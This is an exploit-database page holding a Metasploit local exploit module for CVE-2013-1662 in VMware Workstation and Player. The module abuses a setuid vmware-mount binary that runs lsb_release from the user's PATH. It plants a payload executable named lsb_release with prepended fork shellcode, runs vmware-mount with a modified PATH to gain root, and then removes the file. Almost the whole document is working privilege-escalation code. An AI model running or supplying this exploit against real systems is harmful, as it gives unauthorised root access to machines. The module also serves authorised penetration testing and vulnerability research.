VMWare Setuid vmware-mount Unsafe popen(3)



EKU-ID: 3458 CVE: 2013-1662 OSVDB-ID: 96588
Author: egypt Published: 2013-08-29 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'

class Metasploit4 < Msf::Exploit::Local

	include Msf::Exploit::EXE
	include Msf::Post::Common
	include Msf::Post::File

	def initialize(info={})
		super( update_info( info, {
				'Name'          => 'VMWare Setuid vmware-mount Unsafe popen(3)',
				'Description'   => %q{
					VMWare Workstation (up to and including 9.0.2 build-1031769)
					and Player have a setuid executable called vmware-mount that
					invokes lsb_release in the PATH with popen(3). Since PATH is
					user-controlled, and the default system shell on
					Debian-derived distributions does not drop privs, we can put
					an arbitrary payload in an executable called lsb_release and
					have vmware-mount happily execute it as root for us.
				},
				'License'       => MSF_LICENSE,
				'Author'        =>
					[
						'Tavis Ormandy', # Vulnerability discovery and PoC
						'egypt' # Metasploit module
					],
				'Platform'      => [ 'linux' ],
				'Arch'          => ARCH_X86,
				'Targets'       =>
					[
						[ 'Automatic', { } ],
					],
				'DefaultOptions' => {
					"PrependSetresuid" => true,
					"PrependSetresgid" => true,
				},
				'Privileged'     => true,
				'DefaultTarget' => 0,
				'References' => [
					[ 'CVE', '2013-1662' ],
					[ 'OSVDB', '96588' ],
					[ 'BID', '61966'],
					[ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
					[ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ]
				],
				'DisclosureDate' => "Aug 22 2013"
			}
			))
		# Handled by ghetto hardcoding below.
		deregister_options("PrependFork")
	end

	def check
		if setuid?("/usr/bin/vmware-mount")
			CheckCode::Vulnerable
		else
			CheckCode::Safe
		end
	end

	def exploit
		unless check == CheckCode::Vulnerable
			fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
		end

		# Ghetto PrependFork action which is apparently only implemented for
		# Meterpreter.
		# XXX Put this in a mixin somewhere
		# if(fork()) exit(0);
		# 6A02              push byte +0x2
		# 58                pop eax
		# CD80              int 0x80 ; fork
		# 85C0              test eax,eax
		# 7406              jz 0xf
		# 31C0              xor eax,eax
		# B001              mov al,0x1
		# CD80              int 0x80 ; exit
		exe = generate_payload_exe(
			:code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded
		)
		write_file("lsb_release", exe)

		cmd_exec("chmod +x lsb_release")
		cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
		# Delete it here instead of using FileDropper because the original
		# session can clean it up
		cmd_exec("rm -f lsb_release")
	end

	def setuid?(remote_file)
		!!(cmd_exec("test -u /usr/bin/vmware-mount && echo true").index "true")
	end

end